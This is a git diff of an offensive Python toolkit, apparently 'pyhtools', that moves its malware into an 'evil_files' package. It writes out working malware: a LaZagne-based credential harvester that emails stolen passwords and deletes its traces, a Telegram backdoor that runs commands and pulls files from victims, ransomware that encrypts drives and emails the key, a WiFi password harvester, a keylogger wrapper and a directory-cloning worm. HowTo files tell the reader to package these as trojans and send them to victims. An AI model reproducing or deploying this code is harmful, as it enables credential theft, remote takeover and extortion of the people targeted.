Download Python for windows -- Install Downloaded python for windows using wine on linux + +- Install Wine +- Download Python for windows +- Install Downloaded python for windows using wine on linux - the other commands remain the same to create executable. diff --git a/HowTo/Malwares/SendEmail.md b/HowTo/Malwares/SendEmail.md new file mode 100644 index 0000000..93c0ccc --- /dev/null +++ b/HowTo/Malwares/SendEmail.md @@ -0,0 +1,22 @@ +# Send Email Requirements + +## Steps + +- Turn on 2FA +- Go to GoogleAcc->Security->AppPassword->Custom +- Copy generated key and use that as password + +## Use malwares.utils module + +```python +from pyhtools.malwares.utils import send_mail + +send_mail( + email = 'email.id@domain.com', + password = 'your', + receiver_mail = 'emails_separated_by_comma', + message = 'your message', + smtp_server = 'smtp.gmail.com', + smtp_port= 587 +) +``` diff --git a/pyhtools/malwares/telegram_data_harvester/HowToUse.md b/HowTo/Malwares/TelegramDataHarvester.md similarity index 99% rename from pyhtools/malwares/telegram_data_harvester/HowToUse.md rename to HowTo/Malwares/TelegramDataHarvester.md index 8a3cc23..f049454 100644 --- a/pyhtools/malwares/telegram_data_harvester/HowToUse.md +++ b/HowTo/Malwares/TelegramDataHarvester.md @@ -1,6 +1,7 @@ # How to use Telegram Data Harvester ## Steps + - Create a Gmail App Password - update telegram_data_harvester.py lines 64 and 65 with your gmail and App Password - Create a executable file or trojan @@ -8,6 +9,7 @@ - You will receive an email with telegram data as a zip when target executes the program/trojan. ## How to use their account + - Extract tdata folder from the zip file - go to your installed telegram desktop location - replace your tdata file with the zip tdata folder diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md b/HowTo/Malwares/TelegramRemoteCodeExecutor.md similarity index 96% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md rename to HowTo/Malwares/TelegramRemoteCodeExecutor.md index 87c330c..795bf74 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md +++ b/HowTo/Malwares/TelegramRemoteCodeExecutor.md @@ -1,12 +1,11 @@ # How to use Telegram Remote Code Executor -- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` -- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` +- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` +- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` - Create trojan/malware using `pyinstaller` and send it to victim - When victims runs malware program, attacker will be notified through the bot on telegram - Attacker can use commands to exploit the machine remotely through Telegram over the internet - | Command | Description | Params | |:-----:|:--------:|:-------: | | /start | starts interaction with the bot and returns command issuer details | None | diff --git a/HowTo/Malwares/WirelessProfileHarvester.md b/HowTo/Malwares/WirelessProfileHarvester.md new file mode 100644 index 0000000..25a549b --- /dev/null +++ b/HowTo/Malwares/WirelessProfileHarvester.md @@ -0,0 +1,7 @@ +# Wireless Profile Harvester + +## HOW to use + +- Read [HowTo/Malwares/SendEmail.md](./SendEmail.md) to and use app password +- Update email id and password (app password) +- Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/Malwares/TelegramBackdoor.py new file mode 100644 index 0000000..d9d83fe --- /dev/null +++ b/examples/Malwares/TelegramBackdoor.py @@ -0,0 +1,14 @@ +from curses import start_color +''' +Controls the compromised machine using telegram +''' +import pyhtools.evil_files.malwares.telegram_remote_code_executor.TelegramRemoteCodeExecutor as evil_bot + +# set API_KEY and CHAT_ID before starting bot +# Note: to find user id, start the bot, and message this bot with /start +evil_bot.API_KEY = 'your_bot_key/token' +evil_bot.CHAT_ID = 0 # int - attacker's user id + +# start bot +# Note: for windows create malware with runtime broker +evil_bot.start_bot() \ No newline at end of file diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/Malwares/TelegramDataHarvester.py new file mode 100644 index 0000000..52ffead --- /dev/null +++ b/examples/Malwares/TelegramDataHarvester.py @@ -0,0 +1,12 @@ +from pyhtools.evil_files.malwares.telegram_data_harvester.harvester import TelegramHarvester + + +tdata_harvester = TelegramHarvester( + sender_email='dummy_email', # dummy email to send collected data + sender_passwd='dummy_email_passwd', # dummy email account password for authentication + server='smtp.gmail.com', # smtp email server domain + port=587, # smtp server port + receivers='attacker_email', # email where harvested data will sent +) + +tdata_harvester.start() diff --git a/pyhtools/malwares/keylogger/dlogs.py b/examples/Malwares/key_logger.py similarity index 64% rename from pyhtools/malwares/keylogger/dlogs.py rename to examples/Malwares/key_logger.py index f3ca53e..35b7f54 100644 --- a/pyhtools/malwares/keylogger/dlogs.py +++ b/examples/Malwares/key_logger.py @@ -1,4 +1,4 @@ -from keylogger import KeyLogger +from pyhtools.evil_files.malwares.keylogger import KeyLogger key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60) key_logger.run() diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/Malwares/wifi-password-harvester.py new file mode 100644 index 0000000..b9b7fbd --- /dev/null +++ b/examples/Malwares/wifi-password-harvester.py @@ -0,0 +1,13 @@ +import imp +from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester + +# create obj +harvester = WiFiPasswordHarvester( + email='your_email', + passwd='email_passwd', + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +# start harvester +harvester.start() diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/Ransomwares/dmsec_decrypter.py new file mode 100644 index 0000000..ebb9e1f --- /dev/null +++ b/examples/Ransomwares/dmsec_decrypter.py @@ -0,0 +1,14 @@ +from pyhtools.evil_files.ransomwares.dmsec.decrypter import DMSecDecrypter + +print('[*] Decrypting....') + +# specify paths to be decrypted +PATHS = [r'paths_to_be_decrypted', ] + +KEY = input('[+] Enter KEY : ') + +# don't pass PATHS if all the drives are to be decrypted. +encrypter = DMSecDecrypter(KEY, PATHS) +encrypter.start() + +print('[*] Decrypted...') diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/Ransomwares/dmsec_encrypter.py new file mode 100644 index 0000000..3099c53 --- /dev/null +++ b/examples/Ransomwares/dmsec_encrypter.py @@ -0,0 +1,21 @@ +from pyhtools.evil_files.ransomwares.dmsec.encrypter import DMSecEncrypter + +# Print some meaningful text, so that user don't suspect program as ransomeware +print('[*] Loading...') + +# Specify paths to be encrypted +PATHS = [ + r'path_to_be_encrypted', +] + +# don't pass PATHS if all the drives are to be encrypted +encrypter = DMSecEncrypter( + paths=PATHS, + email='yourgmailid', + passwd='yourapppassword' + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +encrypter.start() +print('[*] Completed') diff --git a/examples/Worms/DirClonerWorm.py b/examples/Worms/DirClonerWorm.py new file mode 100644 index 0000000..654230f --- /dev/null +++ b/examples/Worms/DirClonerWorm.py @@ -0,0 +1,20 @@ +from pyhtools.evil_files.worms.dir_cloner import DirCloner + +# create obj and path +dir_worm = DirCloner() +path = dir_worm.get_curr_drive_folder() + +# set cloning directory +dir_clone_set_status = dir_worm.set_clone_path(path) + +# remove print statements while creating evil files +if dir_clone_set_status: + print(f"[*] Clone path : {path}") +else: + print(f"[!] Failed to set new clone path {path}") + +# for specific folder +dir_worm.clone_dir(times=1, start_after=0) + +# for specific folder and its subfolder +dir_worm.clone_all_dirs(times=1, start_after=0, path=path) diff --git a/pyhtools/UI/functions.py b/pyhtools/UI/functions.py index 0c1b4bf..f2b5e38 100644 --- a/pyhtools/UI/functions.py +++ b/pyhtools/UI/functions.py @@ -1,11 +1,11 @@ from pyhtools.UI.colors import * from prettytable import PrettyTable +from pyhtools.evil_files.malwares.utils import send_mail import pyfiglet import os import sys import pyhtools.attackers.attackers as attacker -import pyhtools.malwares.reverse_backdoor.TCP.listener as listener -import pyhtools.malwares.send_mail.send_mail as mail +import pyhtools.evil_files.malwares.reverse_backdoor.TCP.listener as listener def clrscr(): @@ -23,7 +23,7 @@ def banner(): print(BRIGHT_YELLOW + pyfiglet.figlet_format('PyHTools')) print(BRIGHT_YELLOW + '+' + '-'*42 + '+') - print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0 |') + print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0.1 |') print(BRIGHT_YELLOW + '+' + '-'*42 + '+') @@ -72,7 +72,7 @@ def send_mail_to(email, password, receiver, subject, body) -> bool: ''' print(BRIGHT_WHITE + '[*] Sending email...') msg = f'Subject: {subject}\n{body}' - if mail.send_mail_to(email, receiver, password, msg): + if send_mail(email, receiver, password, msg): print(BRIGHT_YELLOW + '[\u2714] Mail Sent') else: print(BRIGHT_RED + '[\u274c] Unable to send mail.') diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py b/pyhtools/evil_files/malwares/__init__.py similarity index 100% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py rename to pyhtools/evil_files/malwares/__init__.py diff --git a/pyhtools/malwares/Trojans/__init__.py b/pyhtools/evil_files/malwares/credential_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/Trojans/__init__.py rename to pyhtools/evil_files/malwares/credential_harvester/__init__.py diff --git a/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py new file mode 100644 index 0000000..cfa7c1b --- /dev/null +++ b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py @@ -0,0 +1,59 @@ +''' +module: credential_harvester.py +description: get user credentials on Windows machine +platform: Windows +''' +import requests +import os +import tempfile +import subprocess +import zipfile +from pyhtools.evil_files.malwares.utils import send_mail, download +from shutil import rmtree + + +class CredentialHarvester: + @staticmethod + def run(email: str, password: str, lazagne_download_link: str = r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip', smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587): + ''' + generates data report and sends email to self + ''' + # change workding directory to tmp directory + tmp_dir = tempfile.gettempdir() + os.chdir(tmp_dir) + + # get file and extracted directory names + file_name = lazagne_download_link.split('/')[-1] # Windows.zip + extract_dir = file_name.split('.')[0] # Windows + + # download and unzip lazagne + download(lazagne_download_link) + with zipfile.ZipFile(file_name, 'r') as zip_file: + zip_file.extractall(tmp_dir) + + # change to extracted directory (Windows) + os.chdir(extract_dir) + + # generate reports + recovered_report = subprocess.call('laZagne_x86.exe all') + report = subprocess.check_output('lazagne.exe all -vv') + msg = f'Subject: Credential Harvester Report.\n\n{"-"*25}\n{report}\n{"-"*25}\n{recovered_report}' + + # mail reports + send_mail( + email=email, + receiver_mail=email, + password=password, + message=msg, + smtp_server=smtp_server, + smtp_port=smtp_port, + ) + + # remove traces + os.chdir('..') + rmtree(extract_dir) + os.remove(file_name) + + +if __name__ == '__main__': + CredentialHarvester.run('your_gmail', 'your_gmail_passwd') diff --git a/pyhtools/malwares/__init__.py b/pyhtools/evil_files/malwares/keylogger/__init__.py similarity index 100% rename from pyhtools/malwares/__init__.py rename to pyhtools/evil_files/malwares/keylogger/__init__.py diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py similarity index 100% rename from pyhtools/malwares/keylogger/keylogger.py rename to pyhtools/evil_files/malwares/keylogger/keylogger.py diff --git a/pyhtools/malwares/credential_harvester/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py similarity index 100% rename from pyhtools/malwares/credential_harvester/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py diff --git a/pyhtools/malwares/downloader/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py similarity index 100% rename from pyhtools/malwares/downloader/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py diff --git a/pyhtools/malwares/keylogger/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/__init__.py similarity index 100% rename from pyhtools/malwares/keylogger/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/__init__.py b/pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/__init__.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py similarity index 92% rename from pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py index 5123331..5c813b2 100644 --- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py +++ b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py @@ -144,12 +144,3 @@ def start(self): for tpath in self.tdata_paths: self.create_archive_and_send_mail( source_path=tpath, dest_path=self.temp_path) - -if __name__ == '__main__': - tdata_harvester = TelegramHarvester( - sender_email='dummy_email', # dummy email to send collected data - sender_passwd='dummy_email_passwd', # dummy email account password for authentication - server='smtp.gmail.com', # smtp email server domain - port=587, # smtp server port - receivers='attacker_email', # email where harvested data will sent - ) \ No newline at end of file diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py similarity index 80% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py index df5c501..188e57e 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py +++ b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py @@ -1,11 +1,12 @@ -import telebot, os +import telebot +import os from telebot.types import Message as tele_message from subprocess import check_output # set API_KEY and CHAT_ID before starting bot API_KEY = 'your_bot_key/token' -CHAT_ID = 0 # int - attacker's user id +CHAT_ID = 0 # int - attacker's user id # to find user id, start the bot, and message this bot with /start @@ -26,11 +27,12 @@ /download download file from the victims machine to attacker's via telegram chat ''' +# might raise issue, need to update API value bot = telebot.TeleBot(API_KEY) def get_victim(): - return check_output("whoami",shell=True).decode("utf-8") + return check_output("whoami", shell=True).decode("utf-8") def inform_attacker(): @@ -41,28 +43,29 @@ def inform_attacker(): bot.send_message(CHAT_ID, text=message) -def get_user_details(message:tele_message): +def get_user_details(message: tele_message): ''' returns messenger's details ''' return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}' -def validate_request(message:tele_message) -> bool: +def validate_request(message: tele_message) -> bool: ''' returns True is if request is from hacker, else False ''' if message.from_user.id != int(CHAT_ID): alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}' bot.send_message(chat_id=CHAT_ID, text=alert_message) - bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!') + bot.send_message(chat_id=message.from_user.id, + text='Not Authorized !!') return False return True @bot.message_handler(commands=['start']) -def start(message:tele_message): +def start(message: tele_message): ''' start conversation ''' @@ -74,12 +77,12 @@ def start(message:tele_message): @bot.message_handler(commands=['exec']) -def execute(message:tele_message): +def execute(message: tele_message): ''' executes and returns result to the attacker ''' if not validate_request(message): - return + return cmd = message.text.split('/exec')[-1].strip() try: @@ -91,7 +94,7 @@ def execute(message:tele_message): @bot.message_handler(commands=['help']) -def help(message:tele_message): +def help(message: tele_message): ''' prints help ''' @@ -100,7 +103,7 @@ def help(message:tele_message): @bot.message_handler(commands=['cd']) -def cd(message:tele_message): +def cd(message: tele_message): ''' change current working directory ''' @@ -114,7 +117,7 @@ def cd(message:tele_message): @bot.message_handler(commands=['ls']) -def ls(message:tele_message): +def ls(message: tele_message): ''' replies with list of all the folders and files in the dir to the attacker ''' @@ -125,20 +128,22 @@ def ls(message:tele_message): @bot.message_handler(commands=['download']) -def download_file(message:tele_message): +def download_file(message: tele_message): ''' downloads file from victim's machine to attacker's machine ''' if not validate_request(message): return - + file_path = message.text.split('/download')[-1].strip() if os.path.isfile(file_path): with open(file_path, 'rb') as file: file_data = file.read() - bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}') + bot.send_document(chat_id=CHAT_ID, data=file_data, + caption=f'[*] {file_path} downloaded from {get_victim()}') else: - bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') + bot.send_message( + chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') def start_bot(): @@ -147,9 +152,3 @@ def start_bot(): ''' inform_attacker() bot.polling() - - -if __name__ == '__main__': - # for windows create malware with runtime broker - # while packaging remove print statements - start_bot() diff --git a/pyhtools/malwares/reverse_backdoor/TCP/__init__.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/__init__.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py new file mode 100644 index 0000000..f8056c6 --- /dev/null +++ b/pyhtools/evil_files/malwares/utils.py @@ -0,0 +1,36 @@ +import smtplib +import requests + + +def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool: + ''' + sends mail to specific address/addresses. + ''' + try: + server = smtplib.SMTP(smtp_server, smtp_port) + server.starttls() + server.login(email, password) + server.sendmail(email, receiver_mail, message) + server.quit() + return True + except smtplib.SMTPException as e: + print('[-] Exception : ', e) + return False + + +def download(url: str) -> bool: + ''' + description: download and save file from the url. + params: url + returns: bool + ''' + try: + response = requests.get(url) + file_name = url.split('/')[-1] + with open(file_name, 'wb') as file: + file.write(response.content) + return True + + except Exception as e: + print('[-] Exception : ', e) + return False diff --git a/pyhtools/malwares/reverse_backdoor/__init__.py b/pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/__init__.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py similarity index 74% rename from pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py index fa8856c..456bcc9 100644 --- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py +++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py @@ -1,34 +1,18 @@ +from pyhtools.evil_files.malwares.utils import send_mail import subprocess -import smtplib import re class WiFiPasswordHarvester: - def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None: + def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # smtp conf self.smtp_server = smtp_server - self.smtp_port = port + self.smtp_port = smtp_port # login details self.email = email self.passwd = passwd - def send_mail(self, message: str) -> bool: - ''' - sends email from mail to itself. - params: mail, password, message -> str - retuns bool - ''' - try: - server = smtplib.SMTP(self.smtp_server, self.smtp_port) - server.starttls() - server.login(self.email, self.password) - server.sendmail(self.email, self.email, message) - server.quit() - return True - except smtplib.SMTPException as e: - return False - def get_credentials(self) -> str: ''' returns wifi credentials as str @@ -71,7 +55,7 @@ def get_username(): def start(self): credentials = self.get_credentials() if credentials: - if self.send_mail(message=credentials): + if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port): print('[*] Process Completed Successfully') return True else: diff --git a/pyhtools/malwares/send_mail/__init__.py b/pyhtools/evil_files/ransomwares/__init__.py similarity index 100% rename from pyhtools/malwares/send_mail/__init__.py rename to pyhtools/evil_files/ransomwares/__init__.py diff --git a/pyhtools/ransomwares/dmsec/HowToUse.md b/pyhtools/evil_files/ransomwares/dmsec/HowToUse.md similarity index 100% rename from pyhtools/ransomwares/dmsec/HowToUse.md rename to pyhtools/evil_files/ransomwares/dmsec/HowToUse.md diff --git a/pyhtools/malwares/telegram_data_harvester/__init__.py b/pyhtools/evil_files/ransomwares/dmsec/__init__.py similarity index 100% rename from pyhtools/malwares/telegram_data_harvester/__init__.py rename to pyhtools/evil_files/ransomwares/dmsec/__init__.py diff --git a/pyhtools/ransomwares/dmsec/decrypter.py b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py similarity index 78% rename from pyhtools/ransomwares/dmsec/decrypter.py rename to pyhtools/evil_files/ransomwares/dmsec/decrypter.py index 5a022fb..0dbe19e 100644 --- a/pyhtools/ransomwares/dmsec/decrypter.py +++ b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py @@ -4,15 +4,16 @@ from os.path import join from psutil import disk_partitions -class DMSECDecrypter: - def __init__(self, key:str=None, paths:list=None) -> None: + +class DMSecDecrypter: + def __init__(self, key: str = None, paths: list = None) -> None: # check key if key == None: print('[!] Invalid KEY') exit() # convert key to bytes - if type(key)==str: + if type(key) == str: key = bytes(key, encoding='utf-8') self.KEY = key print('[!] Decrypting data using KEY :', self.KEY) @@ -27,8 +28,6 @@ def __init__(self, key:str=None, paths:list=None) -> None: self.PATHS = paths print('[!] PATHS to be decrypted :\n', self.PATHS) - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -38,8 +37,7 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - - def decrypt_file(self, file_path:str): + def decrypt_file(self, file_path: str): ''' decrypts single file ''' @@ -61,8 +59,7 @@ def decrypt_file(self, file_path:str): print(f'[!] Failed to decrypt {file_path}') return False - - def decrypt_files(self, path:str): + def decrypt_files(self, path: str): ''' decrypts all the files in the specified path ''' @@ -71,22 +68,6 @@ def decrypt_files(self, path:str): file_path = join(root, file) self.decrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.decrypt_files(path) - - -if __name__ == '__main__': - print('[*] Decrypting....') - - # specify paths to be decrypted - PATHS = [r'paths_to_be_decrypted',] - - KEY = input('[+] Enter KEY : ') - - # don't pass PATHS if all the drives are to be decrypted. - encrypter = DMSECDecrypter(KEY, PATHS) - encrypter.start() - - print('[*] Decrypted...') diff --git a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py similarity index 56% rename from pyhtools/ransomwares/dmsec/dmsec_ransomeware.py rename to pyhtools/evil_files/ransomwares/dmsec/encrypter.py index 66b1723..ced30a1 100644 --- a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py +++ b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py @@ -1,17 +1,18 @@ -import smtplib from cryptography.fernet import Fernet from os import walk, environ from os.path import join from psutil import disk_partitions +from pyhtools.evil_files.malwares.utils import send_mail -class DMSECEncrypter: - def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: +class DMSecEncrypter: + def __init__(self, paths: list = None, email: str = None, passwd: str = None, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # generate new key self.KEY = Fernet.generate_key() + message = f'Subject: RNSMWARE ATTK has been initialized on {environ.get("COMPUTERNAME", None)}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ.get("OS", None)}\n\n' # report KEY to the attacker using email - if gmail!=None and passwd!=None and self.send_mail(mail=gmail, password=passwd): + if email != None and passwd != None and send_mail(email=email, password=passwd, receiver_mail=email, smtp_server=smtp_server, smtp_port=smtp_port): pass else: # print error message and exit if key is not sent @@ -26,23 +27,6 @@ def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: else: self.PATHS = paths - - def send_mail(self, mail, password)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - message = f'Subject: RNSMWARE ATTK has been initialized on {environ["COMPUTERNAME"]}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ["OS"]}\n\n' - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except Exception as e: - return False - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -52,7 +36,6 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - def encrypt_file(self, file_path): try: # read file data @@ -69,28 +52,13 @@ def encrypt_file(self, file_path): except Exception: return False - - - def encrypt_files(self, path:str): + + def encrypt_files(self, path: str): for root, dirs, files in walk(path): for file in files: file_path = join(root, file) self.encrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.encrypt_files(path) - - -if __name__ == '__main__': - # Print some meaningful text, so that user don't suspect program as ransomeware - print('[*] Loading...') - - # Specify paths to be encrypted - PATHS = [r'path_to_be_encrypted',] - - # don't pass PATHS if all the drives are to be encrypted - encrypter = DMSECEncrypter(PATHS, gmail='yourgmailid', passwd='yourapppassword') - encrypter.start() - print('[*] Completed') diff --git a/pyhtools/malwares/wireless_password_harvester/__init__.py b/pyhtools/evil_files/worms/__init__.py similarity index 100% rename from pyhtools/malwares/wireless_password_harvester/__init__.py rename to pyhtools/evil_files/worms/__init__.py diff --git a/pyhtools/worms/dir_cloner.py b/pyhtools/evil_files/worms/dir_cloner.py similarity index 89% rename from pyhtools/worms/dir_cloner.py rename to pyhtools/evil_files/worms/dir_cloner.py index f791ed0..8952daf 100644 --- a/pyhtools/worms/dir_cloner.py +++ b/pyhtools/evil_files/worms/dir_cloner.py @@ -134,21 +134,4 @@ def clone_dir(self, times:int=1000, start_after:int=0, src:str=None, dst:str=Non time.sleep(start_after) for iteration in range(times): threading.Thread(target=self.clone, args=(iteration, src, dst)).start() - - -if __name__=='__main__': - dir_worm = DirCloner() - path = dir_worm.get_curr_drive_folder() - - if dir_worm.set_clone_path(path): - # print(f"[*] Clone path : {path}") - pass - else: - # print(f"[!] Failed to set new clone path {path}") - pass - - # for specific folder - dir_worm.clone_dir(times=1, start_after=0) - - # for specific folder and its subfolder - dir_worm.clone_all_dirs(times=1, start_after=0, path=path) \ No newline at end of file + \ No newline at end of file diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py new file mode 100644 index 0000000..b2a31c2 --- /dev/null +++ b/pyhtools/executable_generator/generator.py @@ -0,0 +1,50 @@ +''' +module: generator.py +description: generates evil files using specified payload and type +''' +from enum import Enum +# from subprocess import check_call, check_output + + +# TODO: convert all evil files modules into classes +# create new class object with parameters and generate +# evil file using specified compiler using subprocess + + +class CompileOptions(Enum): + PYINTALLER = 0 + NUITKA = 1 + + +class Generator: + def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None: + self.__type = _type + self.__payload = payload + self.__compiler = compiler + + self.__options = { + 'malwares': [ + 'credential_harvester', + 'keylogger', + 'http_reverse_backdoor', + 'tcp_reverse_backdoor', + 'telegram_data_harvester', + 'telegram_remote_code_executor', + 'wireless_password_harvester' + ], + 'ransomwares': [ + 'dmsec', + ], + 'worms': [ + 'dir_cloner' + ], + } + + def verify(): + pass + + def show_options(): + pass + + def generate_file(): + pass diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py deleted file mode 100644 index e060667..0000000 --- a/pyhtools/executable_generator/utils.py +++ /dev/null @@ -1,2 +0,0 @@ -from pyhtools.UI.colors import * - diff --git a/pyhtools/malwares/credential_harvester/credential_harvester.py b/pyhtools/malwares/credential_harvester/credential_harvester.py deleted file mode 100644 index cf63495..0000000 --- a/pyhtools/malwares/credential_harvester/credential_harvester.py +++ /dev/null @@ -1,72 +0,0 @@ -#!usr/bin/env python -import smtplib, requests, os, tempfile, subprocess, zipfile -import malwares.send_mail.send_mail as mail - -def send_mail(mail, password, message)->bool: - ''' - description: sends mail to self using gmail smtp. - params: mail, password, message - returns: bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -def download(url:str)->bool: - ''' - description: downloads file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as dfile: - 